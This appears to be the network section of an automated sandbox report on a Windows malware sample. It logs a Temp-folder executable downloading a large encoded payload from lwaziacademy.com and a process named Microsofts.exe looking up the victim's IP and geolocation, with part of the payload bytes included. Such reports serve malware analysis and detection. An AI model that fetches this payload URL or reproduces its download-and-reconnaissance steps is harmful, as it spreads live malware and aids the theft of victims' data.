                                                                                                                            Dec 30, 2024 11:47:04.686238050 CET4972080192.168.2.6193.122.130.0
                                                                                                                            Dec 30, 2024 11:47:04.691031933 CET8049720193.122.130.0192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:04.787921906 CET8049720193.122.130.0192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:04.823014975 CET49726443192.168.2.6188.114.97.3
                                                                                                                            Dec 30, 2024 11:47:04.823070049 CET44349726188.114.97.3192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:04.823152065 CET49726443192.168.2.6188.114.97.3
                                                                                                                            Dec 30, 2024 11:47:04.833676100 CET49726443192.168.2.6188.114.97.3
                                                                                                                            Dec 30, 2024 11:47:04.833694935 CET44349726188.114.97.3192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:04.894030094 CET4972080192.168.2.6193.122.130.0
                                                                                                                            Dec 30, 2024 11:47:05.281771898 CET44349726188.114.97.3192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:05.281919003 CET49726443192.168.2.6188.114.97.3
                                                                                                                            Dec 30, 2024 11:47:05.288009882 CET49726443192.168.2.6188.114.97.3
                                                                                                                            Dec 30, 2024 11:47:05.288021088 CET44349726188.114.97.3192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:05.288311005 CET44349726188.114.97.3192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:05.480159044 CET49726443192.168.2.6188.114.97.3
                                                                                                                            Dec 30, 2024 11:47:05.527339935 CET44349726188.114.97.3192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:05.584780931 CET44349726188.114.97.3192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:05.584850073 CET44349726188.114.97.3192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:05.584933996 CET49726443192.168.2.6188.114.97.3
                                                                                                                            Dec 30, 2024 11:47:05.592060089 CET49726443192.168.2.6188.114.97.3
                                                                                                                            Dec 30, 2024 11:48:09.787547112 CET8049720193.122.130.0192.168.2.6
                                                                                                                            Dec 30, 2024 11:48:09.787607908 CET4972080192.168.2.6193.122.130.0
                                                                                                                            Dec 30, 2024 11:48:44.810112000 CET4972080192.168.2.6193.122.130.0
                                                                                                                            Dec 30, 2024 11:48:44.814949036 CET8049720193.122.130.0192.168.2.6
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 30, 2024 11:46:55.449709892 CET5086953192.168.2.61.1.1.1
                                                                                                                            Dec 30, 2024 11:46:56.434976101 CET53508691.1.1.1192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:04.174577951 CET6247653192.168.2.61.1.1.1
                                                                                                                            Dec 30, 2024 11:47:04.181809902 CET53624761.1.1.1192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:04.812261105 CET5135253192.168.2.61.1.1.1
                                                                                                                            Dec 30, 2024 11:47:04.819380045 CET53513521.1.1.1192.168.2.6
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 30, 2024 11:46:55.449709892 CET192.168.2.61.1.1.10x5941Standard query (0)lwaziacademy.comA (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.174577951 CET192.168.2.61.1.1.10x51a1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.812261105 CET192.168.2.61.1.1.10xc644Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 30, 2024 11:46:56.434976101 CET1.1.1.1192.168.2.60x5941No error (0)lwaziacademy.com41.185.8.252A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.181809902 CET1.1.1.1192.168.2.60x51a1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.181809902 CET1.1.1.1192.168.2.60x51a1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.181809902 CET1.1.1.1192.168.2.60x51a1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.181809902 CET1.1.1.1192.168.2.60x51a1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.181809902 CET1.1.1.1192.168.2.60x51a1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.181809902 CET1.1.1.1192.168.2.60x51a1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.819380045 CET1.1.1.1192.168.2.60xc644No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:47:04.819380045 CET1.1.1.1192.168.2.60xc644No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                            • lwaziacademy.com
                                                                                                                            • reallyfreegeoip.org
                                                                                                                            • checkip.dyndns.org
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.649720193.122.130.0803248C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 30, 2024 11:47:04.201746941 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 30, 2024 11:47:04.667391062 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Mon, 30 Dec 2024 10:47:04 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: b7d8fbf45a1dd532928994469f047bae
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                            Dec 30, 2024 11:47:04.686238050 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 30, 2024 11:47:04.787921906 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Mon, 30 Dec 2024 10:47:04 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 2c86fae7df26c71b629f27f1c6e108fe
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.64971241.185.8.2524435792C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:46:57 UTC169OUTGET /wps/200_Oupzhkprnvw HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept: */*
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                            Host: lwaziacademy.com
                                                                                                                            2024-12-30 10:46:57 UTC182INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Mon, 30 Dec 2024 10:46:57 GMT
                                                                                                                            Content-Length: 906612
                                                                                                                            Connection: close
                                                                                                                            Last-Modified: Fri, 20 Dec 2024 10:43:30 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-12-30 10:46:57 UTC15178INData Raw: 68 59 32 45 4f 41 4b 47 6b 43 72 2f 2f 76 72 74 2f 41 62 33 2f 41 54 74 41 66 54 74 39 51 55 43 38 50 66 74 37 76 30 41 41 50 54 76 2f 66 73 44 38 2f 66 74 2b 66 50 39 2b 76 6f 45 38 76 54 35 41 2f 48 75 2f 50 49 45 42 66 6b 46 39 77 62 76 39 41 62 31 2b 77 51 46 2f 76 44 76 41 4f 33 31 39 66 6a 7a 42 76 76 35 2b 75 2f 79 2f 66 44 34 2f 66 34 47 38 66 4c 30 41 76 62 30 37 2f 37 35 2b 34 57 4e 68 44 67 43 68 70 41 71 4f 51 48 38 42 76 54 33 2f 50 37 36 41 67 4f 46 6a 59 51 34 41 6f 61 51 4b 72 2b 37 70 70 65 49 7a 63 58 56 79 74 48 43 71 4d 54 44 7a 72 7a 4f 31 4a 2b 61 68 39 66 51 76 63 2f 42 32 4b 33 4b 78 63 62 56 79 37 36 6d 6a 6f 44 4a 78 4d 4b 37 7a 63 75 77 79 64 54 4f 31 63 6e 55 75 70 6d 51 7a 63 50 41 79 73 6d 37 6e 4d 62 51 78 74 6e 5a 32 5a 32
                                                                                                                            Data Ascii: hY2EOAKGkCr//vrt/Ab3/ATtAfTt9QUC8Pft7v0AAPTv/fsD8/ft+fP9+voE8vT5A/Hu/PIEBfkF9wbv9Ab1+wQF/vDvAO319fjzBvv5+u/y/fD4/f4G8fL0Avb07/75+4WNhDgChpAqOQH8BvT3/P76AgOFjYQ4AoaQKr+7ppeIzcXVytHCqMTDzrzO1J+ah9fQvc/B2K3KxcbVy76mjoDJxMK7zcuwydTO1cnUupmQzcPAysm7nMbQxtnZ2Z2
                                                                                                                            2024-12-30 10:46:58 UTC16384INData Raw: 45 6f 35 64 57 37 71 43 52 42 39 77 79 2b 61 43 78 47 51 68 65 4f 61 52 72 33 56 34 32 6e 78 41 73 39 76 71 49 6b 55 50 48 45 51 65 48 4b 57 48 54 6a 67 50 31 66 66 52 76 4e 61 4e 43 48 75 44 38 4a 68 42 31 59 4d 7a 57 4e 6b 33 66 2b 59 4e 55 32 4d 62 51 45 2f 57 6d 71 68 37 62 35 30 58 73 73 65 4f 39 79 73 36 30 61 65 4c 41 6f 39 48 66 78 6c 69 30 55 49 63 69 71 45 70 44 4b 4e 75 59 34 45 6d 41 33 71 2f 59 78 78 57 4e 64 30 4b 53 64 55 4b 57 7a 71 4e 5a 2f 49 69 4d 4f 62 38 4b 57 34 61 41 54 39 6e 6a 4a 66 35 4f 77 47 4e 37 77 4b 6f 55 52 2b 43 54 59 51 34 75 57 6a 36 76 4a 4d 41 47 4b 79 73 6f 71 54 70 38 35 56 47 4b 4b 53 63 43 55 63 31 38 72 7a 45 2b 4f 6c 51 49 47 43 63 4b 70 37 6c 63 65 4f 38 4c 65 47 37 2f 4f 49 41 2b 63 4d 31 39 64 45 31 72 4a 79
                                                                                                                            Data Ascii: Eo5dW7qCRB9wy+aCxGQheOaRr3V42nxAs9vqIkUPHEQeHKWHTjgP1ffRvNaNCHuD8JhB1YMzWNk3f+YNU2MbQE/Wmqh7b50XsseO9ys60aeLAo9Hfxli0UIciqEpDKNuY4EmA3q/YxxWNd0KSdUKWzqNZ/IiMOb8KW4aAT9njJf5OwGN7wKoUR+CTYQ4uWj6vJMAGKysoqTp85VGKKScCUc18rzE+OlQIGCcKp7lceO8LeG7/OIA+cM19dE1rJy
                                                                                                                            2024-12-30 10:46:58 UTC16384INData Raw: 73 55 4a 2b 69 53 31 77 49 71 64 42 31 2b 34 66 66 6a 71 42 58 43 56 65 65 4d 73 51 2b 47 71 44 4e 69 49 5a 78 5a 73 67 38 4e 32 52 73 37 77 57 47 48 78 45 46 65 77 59 38 6d 52 53 46 78 49 63 33 55 44 46 4b 67 64 4d 6e 71 42 41 52 6c 52 32 76 59 50 45 4a 64 36 79 75 6c 76 61 77 53 2f 66 7a 5a 6f 46 38 77 79 57 52 38 55 50 61 52 41 35 56 59 51 43 46 74 30 4c 62 47 4a 77 37 49 49 55 57 65 51 4b 72 44 52 44 56 45 65 45 49 66 5a 65 79 43 61 2f 75 6e 67 70 45 73 62 59 62 65 64 32 78 4d 47 5a 4f 2f 71 2b 48 77 46 55 38 58 50 52 4e 41 67 4a 6a 31 67 46 37 6e 4c 61 77 41 2f 5a 5a 37 2f 42 6d 78 34 38 62 33 4e 47 6c 6a 39 6f 7a 41 2f 51 78 48 2b 2f 31 32 48 4f 71 48 4a 54 75 43 37 52 35 4a 54 63 41 6b 68 48 55 36 41 4a 6d 62 34 5a 46 63 6d 45 75 44 49 37 65 37 6c
                                                                                                                            Data Ascii: sUJ+iS1wIqdB1+4ffjqBXCVeeMsQ+GqDNiIZxZsg8N2Rs7wWGHxEFewY8mRSFxIc3UDFKgdMnqBARlR2vYPEJd6yulvawS/fzZoF8wyWR8UPaRA5VYQCFt0LbGJw7IIUWeQKrDRDVEeEIfZeyCa/ungpEsbYbed2xMGZO/q+HwFU8XPRNAgJj1gF7nLawA/ZZ7/Bmx48b3NGlj9ozA/QxH+/12HOqHJTuC7R5JTcAkhHU6AJmb4ZFcmEuDI7e7l
                                                                                                                            2024-12-30 10:46:58 UTC16384INData Raw: 37 65 47 75 37 41 55 75 4e 79 76 4a 41 56 72 72 67 6f 61 33 32 5a 58 5a 47 46 74 67 2b 66 61 2f 72 78 48 71 2b 46 66 6d 70 54 73 2f 72 34 62 75 6f 38 51 39 45 43 46 39 36 4e 4f 2f 54 70 6f 59 6b 70 67 78 4b 4d 6f 68 4a 41 6f 5a 45 37 6c 6e 2b 50 76 50 4b 4f 65 56 72 54 4f 43 58 62 6d 77 76 57 47 61 38 32 45 61 41 74 72 57 65 71 64 6e 41 75 72 32 72 6a 66 79 64 52 76 76 70 6c 79 7a 32 50 39 4d 58 4c 35 58 33 66 2b 31 48 54 51 47 6c 39 73 31 44 41 45 5a 6c 6a 62 72 54 71 53 30 72 73 4a 30 50 69 4a 4d 59 6a 69 73 79 49 6b 4b 74 6f 58 63 5a 2b 50 45 4b 54 32 58 70 32 6b 36 50 53 2f 70 6b 42 66 45 38 7a 59 6f 47 74 34 67 58 48 75 6e 6a 30 4c 43 7a 51 39 76 34 68 33 2b 37 42 54 63 43 39 4f 59 76 6b 76 6c 38 42 4a 45 6d 48 38 74 56 4c 4f 79 46 6c 51 51 70 68 39
                                                                                                                            Data Ascii: 7eGu7AUuNyvJAVrrgoa32ZXZGFtg+fa/rxHq+FfmpTs/r4buo8Q9ECF96NO/TpoYkpgxKMohJAoZE7ln+PvPKOeVrTOCXbmwvWGa82EaAtrWeqdnAur2rjfydRvvplyz2P9MXL5X3f+1HTQGl9s1DAEZljbrTqS0rsJ0PiJMYjisyIkKtoXcZ+PEKT2Xp2k6PS/pkBfE8zYoGt4gXHunj0LCzQ9v4h3+7BTcC9OYvkvl8BJEmH8tVLOyFlQQph9
                                                                                                                            2024-12-30 10:46:58 UTC16384INData Raw: 44 30 69 74 37 42 70 71 6c 6b 49 2b 76 44 67 69 4d 72 34 4e 77 33 4d 66 53 43 5a 58 2b 65 69 43 77 78 72 5a 75 4f 50 46 42 7a 4e 76 47 76 4f 74 54 53 78 71 74 39 39 44 6d 61 36 6f 34 37 67 4e 39 73 6a 79 5a 35 64 69 54 67 41 63 37 50 65 36 39 71 69 6d 50 4e 69 78 4c 6a 65 6e 6e 31 79 5a 6b 5a 37 75 45 6d 70 36 69 6a 78 45 7a 34 69 4d 62 67 58 56 46 54 57 31 37 59 4a 63 4a 50 32 72 57 41 62 6f 74 53 57 51 32 6d 62 44 6c 69 5a 34 66 5a 66 6f 33 66 39 4c 51 41 65 39 67 62 66 66 68 56 4d 67 4b 55 58 7a 7a 53 35 6c 36 52 6f 39 61 57 67 2f 4b 56 63 41 51 57 4f 46 68 79 44 61 50 79 35 79 63 67 4a 63 4f 62 4f 42 35 4d 5a 70 52 36 47 61 6d 4d 54 36 65 78 2f 61 66 41 54 59 62 6b 4c 6c 38 31 35 48 6f 61 7a 76 4f 6c 75 56 4d 2f 49 34 70 52 6e 67 47 68 44 4e 4a 78 4e
                                                                                                                            Data Ascii: D0it7BpqlkI+vDgiMr4Nw3MfSCZX+eiCwxrZuOPFBzNvGvOtTSxqt99Dma6o47gN9sjyZ5diTgAc7Pe69qimPNixLjenn1yZkZ7uEmp6ijxEz4iMbgXVFTW17YJcJP2rWAbotSWQ2mbDliZ4fZfo3f9LQAe9gbffhVMgKUXzzS5l6Ro9aWg/KVcAQWOFhyDaPy5ycgJcObOB5MZpR6GamMT6ex/afATYbkLl815HoazvOluVM/I4pRngGhDNJxN
                                                                                                                            2024-12-30 10:46:58 UTC16384INData Raw: 4f 45 64 76 70 2b 78 66 39 70 63 43 79 6e 57 4f 4c 63 63 34 6d 73 51 75 76 69 53 45 77 78 32 67 45 35 43 51 45 30 74 72 53 44 6e 33 52 63 62 63 48 37 6b 37 49 4f 70 46 71 4a 67 49 4f 47 41 7a 63 69 66 37 5a 68 31 55 42 67 54 34 6d 65 55 74 32 61 69 54 79 6f 65 61 50 7a 39 35 34 42 4b 4d 49 4d 6f 6e 63 4a 2f 56 44 4e 42 32 71 35 66 7a 46 6a 4e 4f 75 45 74 65 64 73 34 4d 6f 45 2b 64 75 42 78 49 52 6b 47 38 6d 73 2b 65 69 6e 32 67 70 6f 61 44 32 64 45 70 61 79 75 68 52 44 51 2b 48 76 78 4e 34 49 64 45 69 72 4a 36 32 66 51 33 39 76 54 59 69 61 70 78 73 76 50 71 79 4e 57 52 66 32 37 2b 4c 74 79 2b 76 30 41 79 6a 42 36 32 45 39 68 2f 42 39 31 55 31 6c 63 6f 5a 39 6f 6c 74 74 30 65 76 52 77 58 34 5a 47 6d 52 69 51 39 68 6c 71 48 54 55 44 4d 61 43 4c 79 72 55 61
                                                                                                                            Data Ascii: OEdvp+xf9pcCynWOLcc4msQuviSEwx2gE5CQE0trSDn3RcbcH7k7IOpFqJgIOGAzcif7Zh1UBgT4meUt2aiTyoeaPz954BKMIMoncJ/VDNB2q5fzFjNOuEteds4MoE+duBxIRkG8ms+ein2gpoaD2dEpayuhRDQ+HvxN4IdEirJ62fQ39vTYiapxsvPqyNWRf27+Lty+v0AyjB62E9h/B91U1lcoZ9oltt0evRwX4ZGmRiQ9hlqHTUDMaCLyrUa
                                                                                                                            2024-12-30 10:46:58 UTC16384INData Raw: 63 70 36 33 79 31 68 61 6d 38 55 45 6e 76 66 61 58 71 56 4a 73 73 4c 2f 74 52 67 35 32 72 49 54 68 33 4b 56 56 2b 44 52 2f 32 48 44 44 54 58 4c 34 57 6d 4a 74 77 41 77 7a 73 31 65 66 5a 46 6e 70 42 61 4b 54 58 4e 76 76 4b 72 46 58 58 79 55 64 57 66 6f 47 69 6a 66 5a 33 58 6d 73 71 63 47 69 6b 68 34 49 34 4f 71 33 65 4f 61 51 39 37 32 6b 78 55 4b 4d 69 32 31 75 76 37 55 59 57 64 57 6e 67 71 69 54 39 43 51 4a 2f 55 61 66 72 33 39 44 31 74 65 36 66 4a 75 56 6a 48 75 4c 65 41 6d 6e 2b 7a 6d 36 57 57 59 33 71 4a 42 4e 71 50 4f 51 6e 42 53 31 47 41 36 43 49 61 54 4e 72 6d 44 31 68 56 58 4a 71 69 4b 4c 34 77 39 35 66 66 67 61 35 51 44 38 32 56 50 4c 67 77 6a 43 47 4a 6e 79 79 49 72 70 66 48 6a 50 66 4a 36 49 44 64 43 31 41 54 6f 41 69 62 67 5a 7a 2f 68 38 44 48
                                                                                                                            Data Ascii: cp63y1ham8UEnvfaXqVJssL/tRg52rITh3KVV+DR/2HDDTXL4WmJtwAwzs1efZFnpBaKTXNvvKrFXXyUdWfoGijfZ3XmsqcGikh4I4Oq3eOaQ972kxUKMi21uv7UYWdWngqiT9CQJ/Uafr39D1te6fJuVjHuLeAmn+zm6WWY3qJBNqPOQnBS1GA6CIaTNrmD1hVXJqiKL4w95ffga5QD82VPLgwjCGJnyyIrpfHjPfJ6IDdC1AToAibgZz/h8DH
                                                                                                                            2024-12-30 10:46:58 UTC16384INData Raw: 62 70 59 39 65 30 39 6b 4e 75 46 2f 61 54 62 78 4a 2f 78 33 6b 6a 44 33 64 6e 36 6e 33 34 38 49 55 71 4f 62 2b 6a 78 34 45 2f 32 78 42 31 4c 6a 68 55 72 56 51 4f 4b 71 69 39 36 4a 56 42 47 35 6c 57 39 47 49 6a 30 65 66 35 58 2b 6a 38 63 64 53 71 44 55 73 68 4a 59 46 44 37 71 48 44 44 38 62 2f 6c 4a 48 4a 4b 2b 70 6b 6e 4f 79 6d 6b 31 78 6a 37 49 76 52 74 75 43 50 4a 5a 6e 65 71 41 33 58 51 62 6c 71 64 34 79 38 44 70 64 51 62 7a 4e 54 79 34 58 2b 71 67 33 4d 73 4a 47 4e 32 49 35 74 63 2b 50 54 41 44 6c 48 4b 50 61 59 67 6c 72 5a 48 31 56 2f 6e 6b 58 2f 32 2f 65 2b 4b 6a 6f 41 54 76 44 42 4f 65 71 48 2f 4f 43 77 43 77 63 74 2f 6c 4a 73 71 6b 6f 66 64 4a 42 74 31 33 46 43 51 36 6f 71 68 47 74 48 36 67 6b 68 5a 55 31 76 4d 74 57 63 70 61 41 54 79 36 33 38 72
                                                                                                                            Data Ascii: bpY9e09kNuF/aTbxJ/x3kjD3dn6n348IUqOb+jx4E/2xB1LjhUrVQOKqi96JVBG5lW9GIj0ef5X+j8cdSqDUshJYFD7qHDD8b/lJHJK+pknOymk1xj7IvRtuCPJZneqA3XQblqd4y8DpdQbzNTy4X+qg3MsJGN2I5tc+PTADlHKPaYglrZH1V/nkX/2/e+KjoATvDBOeqH/OCwCwct/lJsqkofdJBt13FCQ6oqhGtH6gkhZU1vMtWcpaATy638r
                                                                                                                            2024-12-30 10:46:58 UTC1023INData Raw: 64 53 73 6b 6a 72 6d 2f 43 32 38 4d 41 4e 66 64 59 4d 6d 4e 71 37 6a 67 43 63 65 66 2b 4d 6e 69 37 34 4f 33 56 47 33 6a 49 75 6c 5a 44 69 55 4f 55 71 37 50 70 47 67 59 75 75 75 53 6d 65 56 73 4b 69 62 53 54 64 49 62 6e 77 35 42 34 67 41 75 52 4c 68 53 70 41 37 33 70 71 33 38 6a 31 52 54 31 58 62 42 57 32 73 68 32 7a 52 77 46 61 5a 42 64 6a 7a 42 2f 4c 6f 54 56 2b 35 37 62 42 50 52 74 74 5a 64 74 39 49 32 67 4f 39 51 46 70 64 33 41 4f 58 71 33 62 46 42 30 4a 58 41 6f 36 6e 76 65 48 44 49 58 51 6d 44 66 57 73 5a 5a 42 64 33 70 73 76 72 49 34 43 50 66 2f 4b 49 35 76 77 75 79 46 74 4f 31 70 48 37 4b 30 2b 76 34 71 79 4a 4e 44 42 57 42 54 73 4b 34 79 73 49 67 79 4c 48 31 63 47 4e 58 5a 2f 6b 77 65 4d 4d 6f 72 7a 66 38 4d 45 78 70 42 32 5a 70 39 4a 56 41 43 47
                                                                                                                            Data Ascii: dSskjrm/C28MANfdYMmNq7jgCcef+Mni74O3VG3jIulZDiUOUq7PpGgYuuuSmeVsKibSTdIbnw5B4gAuRLhSpA73pq38j1RT1XbBW2sh2zRwFaZBdjzB/LoTV+57bBPRttZdt9I2gO9QFpd3AOXq3bFB0JXAo6nveHDIXQmDfWsZZBd3psvrI4CPf/KI5vwuyFtO1pH7K0+v4qyJNDBWBTsK4ysIgyLH1cGNXZ/kweMMorzf8MExpB2Zp9JVACG
                                                                                                                            2024-12-30 10:46:58 UTC16384INData Raw: 78 49 6d 4b 54 5a 38 5a 34 4c 54 50 43 53 6d 35 52 48 68 2b 4b 48 46 6f 33 45 61 77 46 4a 52 7a 45 4b 41 75 46 42 67 63 78 36 2f 56 38 38 36 49 75 2b 53 4a 76 4b 61 73 71 73 4b 6c 33 43 41 74 41 79 64 39 4c 75 35 6b 4e 55 68 2b 6f 68 4d 57 2b 37 66 48 4f 7a 68 45 4c 45 4f 6c 68 53 4c 39 5a 66 2f 6f 58 56 54 6b 43 6a 75 4f 37 56 55 4e 6b 58 53 76 67 67 4a 63 55 78 4d 49 48 50 65 4d 6b 44 58 42 7a 48 4e 77 56 34 58 72 38 6e 51 36 56 6b 39 4c 34 58 5a 77 6f 5a 58 56 72 74 4b 4b 33 46 57 67 45 64 4f 77 42 6c 72 48 41 35 68 4b 68 4e 64 48 4e 63 32 2f 2b 4a 4a 74 52 47 54 78 2f 52 4b 6a 77 43 79 58 51 47 66 67 4f 48 31 35 6e 65 6f 47 39 79 41 39 43 36 43 4e 38 75 38 63 41 4a 67 4b 37 46 6d 2f 6a 43 74 43 31 37 31 79 51 56 44 6b 51 55 47 69 37 6f 7a 46 61 30 52
                                                                                                                            Data Ascii: xImKTZ8Z4LTPCSm5RHh+KHFo3EawFJRzEKAuFBgcx6/V886Iu+SJvKasqsKl3CAtAyd9Lu5kNUh+ohMW+7fHOzhELEOlhSL9Zf/oXVTkCjuO7VUNkXSvggJcUxMIHPeMkDXBzHNwV4Xr8nQ6Vk9L4XZwoZXVrtKK3FWgEdOwBlrHA5hKhNdHNc2/+JJtRGTx/RKjwCyXQGfgOH15neoG9yA9C6CN8u8cAJgK7Fm/jCtC171yQVDkQUGi7ozFa0R


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.649726188.114.97.34433248C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:47:05 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-30 10:47:05 UTC856INHTTP/1.1 200 OK
                                                                                                                            Date: Mon, 30 Dec 2024 10:47:05 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Age: 870414
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            cf-cache-status: HIT
                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltuuTLEr3cWOPOpV1NJelM%2FJJ6DOu1DtzA8lb2Ij4jz%2FTOLEt062Pztmgje6CxJbfKs6tisj7CCHSD5Bmyq%2FYlig6GJxieG9qyPTQTYAdjr4MzHifFlhTd68hGZ5j9%2F7uEeQDOxd"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fa173238821c347-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1733&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1649717&cwnd=187&unsent_bytes=0&cid=fe05c71c816393d5&ts=313&x=0"
                                                                                                                            2024-12-30 10:47:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Click to jump to process

